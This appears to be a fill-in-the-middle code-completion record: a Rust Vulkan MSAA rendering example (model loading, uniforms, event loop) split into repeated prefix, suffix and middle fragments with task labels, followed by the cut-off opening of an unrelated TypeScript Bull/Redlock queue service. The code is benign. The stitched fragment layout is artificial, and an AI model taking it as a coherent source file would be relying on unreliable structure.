return renderer.recreate_swapchain(size.width, size.height);
}
_ => (),
}
Ok(())
}
fn update_uniforms(
renderer: &VulkanRenderer, object: &DrawableObject<VulkanRenderer, DefaultForwardShaderLayout>,
position: uv::Vec3, rotation: f32, camera_height: f32, enable_colors: bool, ar: f32,
) -> SarektResult<()> {
// Pi radians per second around the y axis.
let total_rotation =
uv::Mat4::from_rotation_y(rotation) * uv::Mat4::from_rotation_x(-std::f32::consts::PI / 2f32);
let model_matrix = uv::Mat4::from_translation(position) * total_rotation;
let view_matrix = uv::Mat4::look_at(
/* eye= */ uv::Vec3::new(0.0f32, camera_height, 0.0f32),
/* at= */ position,
/* up= */ uv::Vec3::unit_y(),
);
// TODO BACKENDS this proj should be conditional on backend.
let perspective_matrix =
uv::projection::rh_yup::perspective_vk(std::f32::consts::PI / 2f32, ar, 0.1f32, 10f32);
let uniform = DefaultForwardShaderLayout::new(
perspective_matrix * view_matrix * model_matrix,
enable_colors,
/* enable_texture_mixing= */ true,
);
object.set_uniform(renderer, &uniform)
}
/// For now only use the first object in the obj file.
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_obj_models(obj_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let mut model_file = File::open(obj_file_path).unwrap();
let mut model_file_text = String::new();
model_file.read_to_string(&mut model_file_text).unwrap();
let obj_set = obj::obj::parse(&model_file_text).unwrap();
if obj_set.objects.len() != 1 {
panic!(
"The model you attempted to load has more than one object in it, implying it is a scene, if \
you wish to use it as a single model, modify the application code to ignore that or join \
your meshes into a single model"
);
}
info!("Loaded model {}", OBJ_MODEL_FILE_NAME);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Vec<u32> = Vec::new();
// Map of inserted (obj_vertex_index, obj_texture_index) to index in the
// vertices array im building.
let mut inserted_indices: HashMap<(usize, usize), usize> = HashMap::new();
let model_vertices = &obj_set.objects[0].vertices;
for geo in obj_set.objects[0].geometry.iter() {
// For every set of geometry (regardless of material for now).
for shape in geo.shapes.iter() {
// For every face/shape in the set of geometry.
match shape.primitive {
obj::obj::Primitive::Triangle(x, y, z) => |
_ => warn!("Unsupported primitive!"),
}
}
}
info!(
"Vertices/indices in model: {}, {}",
vertices.len(),
indices.len()
);
(vertices, Some(indices))
}
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_glb_model(gltf_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let (document, buffers, _) = gltf::import(gltf_file_path).unwrap();
if document.scenes().len() != 1 || document.scenes().next().unwrap().nodes().len() != 1 {
panic!(
"The model you attempted to load has more than one scene or node in it, if you wish to use \
it as a single model, modify the application code to ignore that or join your meshes into \
a single model"
);
}
let mesh = document.meshes().nth(0).unwrap();
info!("Loaded model {}", gltf_file_path);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Option<Vec<u32>> = None;
for primitive in mesh.primitives() {
let reader = primitive.reader(|buffer| Some(&buffers[buffer.index()]));
let positions = reader.read_positions().unwrap();
let tex_coords = reader.read_tex_coords(0).unwrap().into_f32();
for (position, tex_coord) in izip!(positions, tex_coords) {
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&position, &tex_coord,
));
}
reader
.read_indices()
.map(|it| indices.get_or_insert(Vec::new()).extend(&mut it.into_u32()));
}
info!(
"Vertices/indices in model: {}, {:?}",
vertices.len(),
indices.as_ref().map(|i| i.len())
);
(vertices, indices)
}
fn get_mip_levels(dimensions: (u32, u32)) -> u32 {
let w = dimensions.0;
let h = dimensions.1;
(w.max(h) as f32).log2().floor() as u32 + 1
}
| {
for &vert in [x, y, z].iter() {
// We're only building a buffer of indices and vertices which contain position
// and tex coord.
let index_key = (vert.0, vert.1.unwrap());
if let Some(&vtx_index) = inserted_indices.get(&index_key) {
// Already loaded this (vertex index, texture index) combo, just add it to the
// index buffer.
indices.push(vtx_index as _);
continue;
}
// This is a new unique vertex (where a vertex is both a position and it's
// texture coordinate) so add it to the vertex buffer and the index buffer.
let current_vertex = model_vertices[vert.0];
let vertex_as_float = [
current_vertex.x as f32,
current_vertex.y as f32,
current_vertex.z as f32,
];
let texture_vertices = &obj_set.objects[0].tex_vertices;
let tex_vertex = texture_vertices[vert.1.unwrap()];
// TODO BACKENDS only flip on coordinate systems that should.
let texture_vertex_as_float = [tex_vertex.u as f32, 1f32 - tex_vertex.v as f32];
// Ignoring normals, there is no shading in this example.
// Keep track of which keys were inserted and add this vertex to the index
// buffer.
inserted_indices.insert(index_key, vertices.len());
indices.push(vertices.len() as _);
// Add to the vertex buffer.
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&vertex_as_float,
&texture_vertex_as_float,
));
}
} | conditional_block |
10_msaa.rs | use itertools::izip;
use log::{info, warn, Level};
use sarekt::{
self,
error::{SarektError, SarektResult},
image_data::ImageData,
renderer::{
buffers_and_images::{
BufferType, IndexBufferElemSize, MagnificationMinificationFilter, TextureAddressMode,
},
config::{Config, MsaaConfig},
drawable_object::DrawableObject,
vertex_bindings::{DefaultForwardShaderLayout, DefaultForwardShaderVertex},
Drawer, Renderer, VulkanRenderer,
},
};
use std::{
collections::HashMap, convert::TryInto, f32, fs::File, io::Read, sync::Arc, time::Instant,
};
use ultraviolet as uv;
use wavefront_obj as obj;
use winit::{
dpi::{LogicalSize, PhysicalSize},
event::{ElementState, Event, VirtualKeyCode, WindowEvent},
event_loop::{ControlFlow, EventLoop},
platform::desktop::EventLoopExtDesktop,
window::{WindowBuilder, WindowId},
};
const WIDTH: u32 = 1600;
const HEIGHT: u32 = 1200;
const GLB_MODEL_FILE_NAME: &str = "models/chalet.glb";
const OBJ_MODEL_FILE_NAME: &str = "models/viking_room.obj";
const MODEL_TEXTURE_FILE_NAME_GLB: &str = "textures/chalet.jpg";
const MODEL_TEXTURE_FILE_NAME_OBJ: &str = "textures/viking_room.png";
fn | () {
simple_logger::init_with_level(Level::Info).unwrap();
main_loop();
}
/// Takes full control of the executing thread and runs the event loop for it.
fn main_loop() {
let args: Vec<String> = std::env::args().collect();
let show_fps = args.contains(&"fps".to_owned());
let use_glb = args.contains(&"glb".to_owned());
let msaa_level = if args.contains(&"4x".to_owned()) {
4u8
} else if args.contains(&"8x".to_owned()) {
8u8
} else if args.contains(&"noaa".to_owned()) {
1u8
} else {
2u8
};
info!("MSAA {}x", msaa_level);
info!("Show FPS: {}", show_fps);
info!("Use GLTF Model Type: {}", use_glb);
info!("Running main loop...");
let mut ar = WIDTH as f32 / HEIGHT as f32;
// Build Window.
let mut event_loop = EventLoop::new();
let window = Arc::new(
WindowBuilder::new()
.with_inner_size(LogicalSize::new(WIDTH, HEIGHT))
.build(&event_loop)
.unwrap(),
);
// Build Renderer.
let config = Config::builder()
.requested_width(WIDTH)
.requested_height(HEIGHT)
.msaa_config(MsaaConfig::new(
msaa_level.try_into().unwrap(),
Some(0.2f32),
))
.build()
.unwrap();
let mut renderer = VulkanRenderer::new(window.clone(), config).unwrap();
// Create Vertex Resources.
let (model_vertices, model_indices) = if use_glb {
load_glb_model(GLB_MODEL_FILE_NAME)
} else {
load_obj_models(OBJ_MODEL_FILE_NAME)
};
info!("Model file loaded");
let model_index_buffer = model_indices.map(|mi| {
renderer
.load_buffer(BufferType::Index(IndexBufferElemSize::UInt32), &mi)
.unwrap()
});
let model_buffer = renderer
.load_buffer(BufferType::Vertex, &model_vertices)
.unwrap();
// Create MVP uniform.
let uniform_handle = renderer
.load_uniform_buffer(DefaultForwardShaderLayout::default())
.unwrap();
// Load textures and create image.
let model_texture_file = if use_glb {
image::open(MODEL_TEXTURE_FILE_NAME_GLB).unwrap()
} else {
image::open(MODEL_TEXTURE_FILE_NAME_OBJ).unwrap()
};
let mip_levels = get_mip_levels(model_texture_file.dimensions());
let model_texture = renderer
.load_image_with_staging_initialization(
model_texture_file,
MagnificationMinificationFilter::Linear,
MagnificationMinificationFilter::Linear,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
mip_levels,
)
.unwrap();
let mut drawable_object_builder = DrawableObject::builder(&renderer)
.uniform_buffer(&uniform_handle)
.vertex_buffer(&model_buffer)
.texture_image(&model_texture);
if model_index_buffer.is_some() {
drawable_object_builder =
drawable_object_builder.index_buffer(model_index_buffer.as_ref().unwrap());
}
let drawable_object = drawable_object_builder.build().unwrap();
let start_time = Instant::now();
let mut last_frame_time = start_time;
let mut frame_number = 0;
let mut fps_average = 0f32;
let mut camera_height = -0.5f32;
// Run the loop.
event_loop.run_return(move |event, _, control_flow| {
// By default continuously run this event loop, even if the OS hasn't
// distributed an event, that way we will draw as fast as possible.
*control_flow = ControlFlow::Poll;
match event {
Event::MainEventsCleared => {
// All the main events to process are done we can do "work" now (game
// engine state update etc.)
let now = Instant::now();
let time_since_start_secs = ((now - start_time).as_millis() as f32) / 1000f32;
if show_fps {
let time_since_last_frame_secs = ((now - last_frame_time).as_nanos() as f32) / 1e9f32;
let fps = 1f32 / time_since_last_frame_secs;
if frame_number == 0 {
fps_average = 0f32;
} else {
fps_average =
((frame_number as f32 * fps_average) + fps) / (frame_number as f32 + 1f32);
}
frame_number += 1;
info!("Frame Period: {}", time_since_last_frame_secs);
info!("FPS: {}", fps);
info!("FPS averaged: {}", fps_average);
last_frame_time = now;
}
// Rise to max height then gently go back down.
let camera_rate = 0.25f32;
let min_camera_height = -0.5f32;
let camera_range = 2f32;
camera_height =
(camera_rate * time_since_start_secs) % (2.0f32 * camera_range) + min_camera_height;
if camera_height >= (camera_range + min_camera_height) {
camera_height = (2.0f32 * (camera_range + min_camera_height)) - camera_height;
}
let rotation = (std::f32::consts::PI + std::f32::consts::PI * time_since_start_secs / 8f32)
% (2f32 * std::f32::consts::PI);
update_uniforms(
&renderer,
&drawable_object,
uv::Vec3::new(0f32, -1f32, -1.5f32),
rotation,
camera_height,
false,
ar,
)
.unwrap();
renderer.draw(&drawable_object).unwrap();
// At the end of work request redraw.
window.request_redraw();
}
Event::RedrawRequested(_) => {
// Redraw requested, this is called after MainEventsCleared.
renderer.frame().unwrap_or_else(|err| {
match err {
SarektError::SwapchainOutOfDate | SarektError::SuboptimalSwapchain => {
// Handle window resize etc.
warn!("Tried to render without processing window resize event!");
let PhysicalSize { width, height } = window.inner_size();
renderer
.recreate_swapchain(width, height)
.expect("Error recreating swapchain");
}
e => panic!("Frame had an unrecoverable error! {}", e),
}
});
}
Event::WindowEvent { window_id, event } => {
main_loop_window_event(&event, &window_id, control_flow, &mut renderer, &mut ar)
.expect("Error processing window event.");
}
Event::LoopDestroyed => {
// Explicitly call exit so resources are cleaned up.
std::process::exit(0);
}
_ => (),
}
});
}
/// Handles all winit window specific events.
fn main_loop_window_event(
event: &WindowEvent, _id: &WindowId, control_flow: &mut winit::event_loop::ControlFlow,
renderer: &mut VulkanRenderer, ar: &mut f32,
) -> SarektResult<()> {
match event {
WindowEvent::CloseRequested => {
// When the window system requests a close, signal to winit that we'd like to
// close the window.
info!("Exiting due to close request event from window system...");
*control_flow = ControlFlow::Exit;
}
WindowEvent::KeyboardInput { input, .. } => {
// When the keyboard input is a press on the escape key, exit and print the
// line.
if let (Some(VirtualKeyCode::Escape), ElementState::Pressed) =
(input.virtual_keycode, input.state)
{
info!("Exiting due to escape press...");
*control_flow = ControlFlow::Exit
}
}
WindowEvent::Resized(size) => {
// If the size is 0, minimization or something like that happened so I
// toggle drawing.
info!("Window resized, recreating renderer swapchain...");
let enabled = !(size.height == 0 && size.width == 0);
if enabled {
*ar = size.width as f32 / size.height as f32;
}
renderer.set_rendering_enabled(enabled);
return renderer.recreate_swapchain(size.width, size.height);
}
_ => (),
}
Ok(())
}
fn update_uniforms(
renderer: &VulkanRenderer, object: &DrawableObject<VulkanRenderer, DefaultForwardShaderLayout>,
position: uv::Vec3, rotation: f32, camera_height: f32, enable_colors: bool, ar: f32,
) -> SarektResult<()> {
// Pi radians per second around the y axis.
let total_rotation =
uv::Mat4::from_rotation_y(rotation) * uv::Mat4::from_rotation_x(-std::f32::consts::PI / 2f32);
let model_matrix = uv::Mat4::from_translation(position) * total_rotation;
let view_matrix = uv::Mat4::look_at(
/* eye= */ uv::Vec3::new(0.0f32, camera_height, 0.0f32),
/* at= */ position,
/* up= */ uv::Vec3::unit_y(),
);
// TODO BACKENDS this proj should be conditional on backend.
let perspective_matrix =
uv::projection::rh_yup::perspective_vk(std::f32::consts::PI / 2f32, ar, 0.1f32, 10f32);
let uniform = DefaultForwardShaderLayout::new(
perspective_matrix * view_matrix * model_matrix,
enable_colors,
/* enable_texture_mixing= */ true,
);
object.set_uniform(renderer, &uniform)
}
/// For now only use the first object in the obj file.
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_obj_models(obj_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let mut model_file = File::open(obj_file_path).unwrap();
let mut model_file_text = String::new();
model_file.read_to_string(&mut model_file_text).unwrap();
let obj_set = obj::obj::parse(&model_file_text).unwrap();
if obj_set.objects.len() != 1 {
panic!(
"The model you attempted to load has more than one object in it, implying it is a scene, if \
you wish to use it as a single model, modify the application code to ignore that or join \
your meshes into a single model"
);
}
info!("Loaded model {}", OBJ_MODEL_FILE_NAME);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Vec<u32> = Vec::new();
// Map of inserted (obj_vertex_index, obj_texture_index) to index in the
// vertices array im building.
let mut inserted_indices: HashMap<(usize, usize), usize> = HashMap::new();
let model_vertices = &obj_set.objects[0].vertices;
for geo in obj_set.objects[0].geometry.iter() {
// For every set of geometry (regardless of material for now).
for shape in geo.shapes.iter() {
// For every face/shape in the set of geometry.
match shape.primitive {
obj::obj::Primitive::Triangle(x, y, z) => {
for &vert in [x, y, z].iter() {
// We're only building a buffer of indices and vertices which contain position
// and tex coord.
let index_key = (vert.0, vert.1.unwrap());
if let Some(&vtx_index) = inserted_indices.get(&index_key) {
// Already loaded this (vertex index, texture index) combo, just add it to the
// index buffer.
indices.push(vtx_index as _);
continue;
}
// This is a new unique vertex (where a vertex is both a position and it's
// texture coordinate) so add it to the vertex buffer and the index buffer.
let current_vertex = model_vertices[vert.0];
let vertex_as_float = [
current_vertex.x as f32,
current_vertex.y as f32,
current_vertex.z as f32,
];
let texture_vertices = &obj_set.objects[0].tex_vertices;
let tex_vertex = texture_vertices[vert.1.unwrap()];
// TODO BACKENDS only flip on coordinate systems that should.
let texture_vertex_as_float = [tex_vertex.u as f32, 1f32 - tex_vertex.v as f32];
// Ignoring normals, there is no shading in this example.
// Keep track of which keys were inserted and add this vertex to the index
// buffer.
inserted_indices.insert(index_key, vertices.len());
indices.push(vertices.len() as _);
// Add to the vertex buffer.
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&vertex_as_float,
&texture_vertex_as_float,
));
}
}
_ => warn!("Unsupported primitive!"),
}
}
}
info!(
"Vertices/indices in model: {}, {}",
vertices.len(),
indices.len()
);
(vertices, Some(indices))
}
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_glb_model(gltf_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let (document, buffers, _) = gltf::import(gltf_file_path).unwrap();
if document.scenes().len() != 1 || document.scenes().next().unwrap().nodes().len() != 1 {
panic!(
"The model you attempted to load has more than one scene or node in it, if you wish to use \
it as a single model, modify the application code to ignore that or join your meshes into \
a single model"
);
}
let mesh = document.meshes().nth(0).unwrap();
info!("Loaded model {}", gltf_file_path);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Option<Vec<u32>> = None;
for primitive in mesh.primitives() {
let reader = primitive.reader(|buffer| Some(&buffers[buffer.index()]));
let positions = reader.read_positions().unwrap();
let tex_coords = reader.read_tex_coords(0).unwrap().into_f32();
for (position, tex_coord) in izip!(positions, tex_coords) {
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&position, &tex_coord,
));
}
reader
.read_indices()
.map(|it| indices.get_or_insert(Vec::new()).extend(&mut it.into_u32()));
}
info!(
"Vertices/indices in model: {}, {:?}",
vertices.len(),
indices.as_ref().map(|i| i.len())
);
(vertices, indices)
}
fn get_mip_levels(dimensions: (u32, u32)) -> u32 {
let w = dimensions.0;
let h = dimensions.1;
(w.max(h) as f32).log2().floor() as u32 + 1
}
| main | identifier_name |
10_msaa.rs | use itertools::izip;
use log::{info, warn, Level};
use sarekt::{
self,
error::{SarektError, SarektResult},
image_data::ImageData,
renderer::{
buffers_and_images::{
BufferType, IndexBufferElemSize, MagnificationMinificationFilter, TextureAddressMode,
},
config::{Config, MsaaConfig},
drawable_object::DrawableObject,
vertex_bindings::{DefaultForwardShaderLayout, DefaultForwardShaderVertex},
Drawer, Renderer, VulkanRenderer,
},
};
use std::{
collections::HashMap, convert::TryInto, f32, fs::File, io::Read, sync::Arc, time::Instant,
};
use ultraviolet as uv;
use wavefront_obj as obj;
use winit::{
dpi::{LogicalSize, PhysicalSize},
event::{ElementState, Event, VirtualKeyCode, WindowEvent},
event_loop::{ControlFlow, EventLoop},
platform::desktop::EventLoopExtDesktop,
window::{WindowBuilder, WindowId},
};
const WIDTH: u32 = 1600;
const HEIGHT: u32 = 1200;
const GLB_MODEL_FILE_NAME: &str = "models/chalet.glb";
const OBJ_MODEL_FILE_NAME: &str = "models/viking_room.obj";
const MODEL_TEXTURE_FILE_NAME_GLB: &str = "textures/chalet.jpg";
const MODEL_TEXTURE_FILE_NAME_OBJ: &str = "textures/viking_room.png";
fn main() {
simple_logger::init_with_level(Level::Info).unwrap();
main_loop();
}
/// Takes full control of the executing thread and runs the event loop for it.
fn main_loop() |
/// Handles all winit window specific events.
fn main_loop_window_event(
event: &WindowEvent, _id: &WindowId, control_flow: &mut winit::event_loop::ControlFlow,
renderer: &mut VulkanRenderer, ar: &mut f32,
) -> SarektResult<()> {
match event {
WindowEvent::CloseRequested => {
// When the window system requests a close, signal to winit that we'd like to
// close the window.
info!("Exiting due to close request event from window system...");
*control_flow = ControlFlow::Exit;
}
WindowEvent::KeyboardInput { input, .. } => {
// When the keyboard input is a press on the escape key, exit and print the
// line.
if let (Some(VirtualKeyCode::Escape), ElementState::Pressed) =
(input.virtual_keycode, input.state)
{
info!("Exiting due to escape press...");
*control_flow = ControlFlow::Exit
}
}
WindowEvent::Resized(size) => {
// If the size is 0, minimization or something like that happened so I
// toggle drawing.
info!("Window resized, recreating renderer swapchain...");
let enabled = !(size.height == 0 && size.width == 0);
if enabled {
*ar = size.width as f32 / size.height as f32;
}
renderer.set_rendering_enabled(enabled);
return renderer.recreate_swapchain(size.width, size.height);
}
_ => (),
}
Ok(())
}
fn update_uniforms(
renderer: &VulkanRenderer, object: &DrawableObject<VulkanRenderer, DefaultForwardShaderLayout>,
position: uv::Vec3, rotation: f32, camera_height: f32, enable_colors: bool, ar: f32,
) -> SarektResult<()> {
// Pi radians per second around the y axis.
let total_rotation =
uv::Mat4::from_rotation_y(rotation) * uv::Mat4::from_rotation_x(-std::f32::consts::PI / 2f32);
let model_matrix = uv::Mat4::from_translation(position) * total_rotation;
let view_matrix = uv::Mat4::look_at(
/* eye= */ uv::Vec3::new(0.0f32, camera_height, 0.0f32),
/* at= */ position,
/* up= */ uv::Vec3::unit_y(),
);
// TODO BACKENDS this proj should be conditional on backend.
let perspective_matrix =
uv::projection::rh_yup::perspective_vk(std::f32::consts::PI / 2f32, ar, 0.1f32, 10f32);
let uniform = DefaultForwardShaderLayout::new(
perspective_matrix * view_matrix * model_matrix,
enable_colors,
/* enable_texture_mixing= */ true,
);
object.set_uniform(renderer, &uniform)
}
/// For now only use the first object in the obj file.
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_obj_models(obj_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let mut model_file = File::open(obj_file_path).unwrap();
let mut model_file_text = String::new();
model_file.read_to_string(&mut model_file_text).unwrap();
let obj_set = obj::obj::parse(&model_file_text).unwrap();
if obj_set.objects.len() != 1 {
panic!(
"The model you attempted to load has more than one object in it, implying it is a scene, if \
you wish to use it as a single model, modify the application code to ignore that or join \
your meshes into a single model"
);
}
info!("Loaded model {}", OBJ_MODEL_FILE_NAME);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Vec<u32> = Vec::new();
// Map of inserted (obj_vertex_index, obj_texture_index) to index in the
// vertices array im building.
let mut inserted_indices: HashMap<(usize, usize), usize> = HashMap::new();
let model_vertices = &obj_set.objects[0].vertices;
for geo in obj_set.objects[0].geometry.iter() {
// For every set of geometry (regardless of material for now).
for shape in geo.shapes.iter() {
// For every face/shape in the set of geometry.
match shape.primitive {
obj::obj::Primitive::Triangle(x, y, z) => {
for &vert in [x, y, z].iter() {
// We're only building a buffer of indices and vertices which contain position
// and tex coord.
let index_key = (vert.0, vert.1.unwrap());
if let Some(&vtx_index) = inserted_indices.get(&index_key) {
// Already loaded this (vertex index, texture index) combo, just add it to the
// index buffer.
indices.push(vtx_index as _);
continue;
}
// This is a new unique vertex (where a vertex is both a position and it's
// texture coordinate) so add it to the vertex buffer and the index buffer.
let current_vertex = model_vertices[vert.0];
let vertex_as_float = [
current_vertex.x as f32,
current_vertex.y as f32,
current_vertex.z as f32,
];
let texture_vertices = &obj_set.objects[0].tex_vertices;
let tex_vertex = texture_vertices[vert.1.unwrap()];
// TODO BACKENDS only flip on coordinate systems that should.
let texture_vertex_as_float = [tex_vertex.u as f32, 1f32 - tex_vertex.v as f32];
// Ignoring normals, there is no shading in this example.
// Keep track of which keys were inserted and add this vertex to the index
// buffer.
inserted_indices.insert(index_key, vertices.len());
indices.push(vertices.len() as _);
// Add to the vertex buffer.
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&vertex_as_float,
&texture_vertex_as_float,
));
}
}
_ => warn!("Unsupported primitive!"),
}
}
}
info!(
"Vertices/indices in model: {}, {}",
vertices.len(),
indices.len()
);
(vertices, Some(indices))
}
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_glb_model(gltf_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let (document, buffers, _) = gltf::import(gltf_file_path).unwrap();
if document.scenes().len() != 1 || document.scenes().next().unwrap().nodes().len() != 1 {
panic!(
"The model you attempted to load has more than one scene or node in it, if you wish to use \
it as a single model, modify the application code to ignore that or join your meshes into \
a single model"
);
}
let mesh = document.meshes().nth(0).unwrap();
info!("Loaded model {}", gltf_file_path);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Option<Vec<u32>> = None;
for primitive in mesh.primitives() {
let reader = primitive.reader(|buffer| Some(&buffers[buffer.index()]));
let positions = reader.read_positions().unwrap();
let tex_coords = reader.read_tex_coords(0).unwrap().into_f32();
for (position, tex_coord) in izip!(positions, tex_coords) {
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&position, &tex_coord,
));
}
reader
.read_indices()
.map(|it| indices.get_or_insert(Vec::new()).extend(&mut it.into_u32()));
}
info!(
"Vertices/indices in model: {}, {:?}",
vertices.len(),
indices.as_ref().map(|i| i.len())
);
(vertices, indices)
}
fn get_mip_levels(dimensions: (u32, u32)) -> u32 {
let w = dimensions.0;
let h = dimensions.1;
(w.max(h) as f32).log2().floor() as u32 + 1
}
| {
let args: Vec<String> = std::env::args().collect();
let show_fps = args.contains(&"fps".to_owned());
let use_glb = args.contains(&"glb".to_owned());
let msaa_level = if args.contains(&"4x".to_owned()) {
4u8
} else if args.contains(&"8x".to_owned()) {
8u8
} else if args.contains(&"noaa".to_owned()) {
1u8
} else {
2u8
};
info!("MSAA {}x", msaa_level);
info!("Show FPS: {}", show_fps);
info!("Use GLTF Model Type: {}", use_glb);
info!("Running main loop...");
let mut ar = WIDTH as f32 / HEIGHT as f32;
// Build Window.
let mut event_loop = EventLoop::new();
let window = Arc::new(
WindowBuilder::new()
.with_inner_size(LogicalSize::new(WIDTH, HEIGHT))
.build(&event_loop)
.unwrap(),
);
// Build Renderer.
let config = Config::builder()
.requested_width(WIDTH)
.requested_height(HEIGHT)
.msaa_config(MsaaConfig::new(
msaa_level.try_into().unwrap(),
Some(0.2f32),
))
.build()
.unwrap();
let mut renderer = VulkanRenderer::new(window.clone(), config).unwrap();
// Create Vertex Resources.
let (model_vertices, model_indices) = if use_glb {
load_glb_model(GLB_MODEL_FILE_NAME)
} else {
load_obj_models(OBJ_MODEL_FILE_NAME)
};
info!("Model file loaded");
let model_index_buffer = model_indices.map(|mi| {
renderer
.load_buffer(BufferType::Index(IndexBufferElemSize::UInt32), &mi)
.unwrap()
});
let model_buffer = renderer
.load_buffer(BufferType::Vertex, &model_vertices)
.unwrap();
// Create MVP uniform.
let uniform_handle = renderer
.load_uniform_buffer(DefaultForwardShaderLayout::default())
.unwrap();
// Load textures and create image.
let model_texture_file = if use_glb {
image::open(MODEL_TEXTURE_FILE_NAME_GLB).unwrap()
} else {
image::open(MODEL_TEXTURE_FILE_NAME_OBJ).unwrap()
};
let mip_levels = get_mip_levels(model_texture_file.dimensions());
let model_texture = renderer
.load_image_with_staging_initialization(
model_texture_file,
MagnificationMinificationFilter::Linear,
MagnificationMinificationFilter::Linear,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
mip_levels,
)
.unwrap();
let mut drawable_object_builder = DrawableObject::builder(&renderer)
.uniform_buffer(&uniform_handle)
.vertex_buffer(&model_buffer)
.texture_image(&model_texture);
if model_index_buffer.is_some() {
drawable_object_builder =
drawable_object_builder.index_buffer(model_index_buffer.as_ref().unwrap());
}
let drawable_object = drawable_object_builder.build().unwrap();
let start_time = Instant::now();
let mut last_frame_time = start_time;
let mut frame_number = 0;
let mut fps_average = 0f32;
let mut camera_height = -0.5f32;
// Run the loop.
event_loop.run_return(move |event, _, control_flow| {
// By default continuously run this event loop, even if the OS hasn't
// distributed an event, that way we will draw as fast as possible.
*control_flow = ControlFlow::Poll;
match event {
Event::MainEventsCleared => {
// All the main events to process are done we can do "work" now (game
// engine state update etc.)
let now = Instant::now();
let time_since_start_secs = ((now - start_time).as_millis() as f32) / 1000f32;
if show_fps {
let time_since_last_frame_secs = ((now - last_frame_time).as_nanos() as f32) / 1e9f32;
let fps = 1f32 / time_since_last_frame_secs;
if frame_number == 0 {
fps_average = 0f32;
} else {
fps_average =
((frame_number as f32 * fps_average) + fps) / (frame_number as f32 + 1f32);
}
frame_number += 1;
info!("Frame Period: {}", time_since_last_frame_secs);
info!("FPS: {}", fps);
info!("FPS averaged: {}", fps_average);
last_frame_time = now;
}
// Rise to max height then gently go back down.
let camera_rate = 0.25f32;
let min_camera_height = -0.5f32;
let camera_range = 2f32;
camera_height =
(camera_rate * time_since_start_secs) % (2.0f32 * camera_range) + min_camera_height;
if camera_height >= (camera_range + min_camera_height) {
camera_height = (2.0f32 * (camera_range + min_camera_height)) - camera_height;
}
let rotation = (std::f32::consts::PI + std::f32::consts::PI * time_since_start_secs / 8f32)
% (2f32 * std::f32::consts::PI);
update_uniforms(
&renderer,
&drawable_object,
uv::Vec3::new(0f32, -1f32, -1.5f32),
rotation,
camera_height,
false,
ar,
)
.unwrap();
renderer.draw(&drawable_object).unwrap();
// At the end of work request redraw.
window.request_redraw();
}
Event::RedrawRequested(_) => {
// Redraw requested, this is called after MainEventsCleared.
renderer.frame().unwrap_or_else(|err| {
match err {
SarektError::SwapchainOutOfDate | SarektError::SuboptimalSwapchain => {
// Handle window resize etc.
warn!("Tried to render without processing window resize event!");
let PhysicalSize { width, height } = window.inner_size();
renderer
.recreate_swapchain(width, height)
.expect("Error recreating swapchain");
}
e => panic!("Frame had an unrecoverable error! {}", e),
}
});
}
Event::WindowEvent { window_id, event } => {
main_loop_window_event(&event, &window_id, control_flow, &mut renderer, &mut ar)
.expect("Error processing window event.");
}
Event::LoopDestroyed => {
// Explicitly call exit so resources are cleaned up.
std::process::exit(0);
}
_ => (),
}
});
} | identifier_body |
QueueWorkerService.ts | import { Injectable, Injector, ReflectiveInjector } from 'injection-js';
import BullQueue = require('bull');
import { Queue, Job, QueueOptions } from 'bull';
// import { deepstreamQuarantine } from 'deepstream.io-client-js';
import { LoggerService } from '../service/LogService';
import { ConfigService } from '../service/ConfigService';
import { RedisService } from '../service/RedisService';
import { EventService } from '../service/EventService';
import { TenantController } from '../controllers/tenant';
import { PBXExtensionController } from '../controllers/pbx_extension';
import { PBXAgentController } from '../controllers/pbx_agent';
import { UserEventController } from '../controllers/userEvent';
import { RedisOptions, Redis } from 'ioredis';
import Redlock = require('redlock');
import { Lock } from 'redlock';
@Injectable()
/**
* @description 用bull实现队列排队,以每一个组合的每一个队列为一个排队队列,包括插队等功能
*/
export class QueueWorkerService {
private queueTopics: string[];
private queues: Queue[]; // 此处算法可以改进
private childInjector: Injector;
private queueOptions: QueueOptions;
private redlock: Redlock;
private redLockClient: Redis;
private bullQueueClient: Redis;
private redisService: RedisService;
private eventService: EventService;
private pbxAgentController: PBXAgentController;
private pbxExtensionController: PBXExtensionController;
constructor(private injector: Injector, private logger: LoggerService, private config: ConfigService) {
this.createChildInjector();
this.eventService = this.injector.get(EventService);
this.pbxAgentController = this.childInjector.get(PBXAgentController);
this.pbxExtensionController = this.childInjector.get(PBXExtensionController);
}
async init() {
try {
this.redisService = this.injector.get(RedisService);
this.queueOptions = {
redis: {
host: this.config.getConfig().redis.host,
port: this.config.getConfig().redis.port,
password: this.config.getConfig().redis.password ? this.config.getConfig().redis.password : null,
db: 10,
},
prefix: 'esl_bull'
}
this.redLockClient = this.redisService.getClientByName('RedLock');
this.bullQueueClient = this.redisService.getClientByName('BullQueue');
this.redlock = new Redlock(
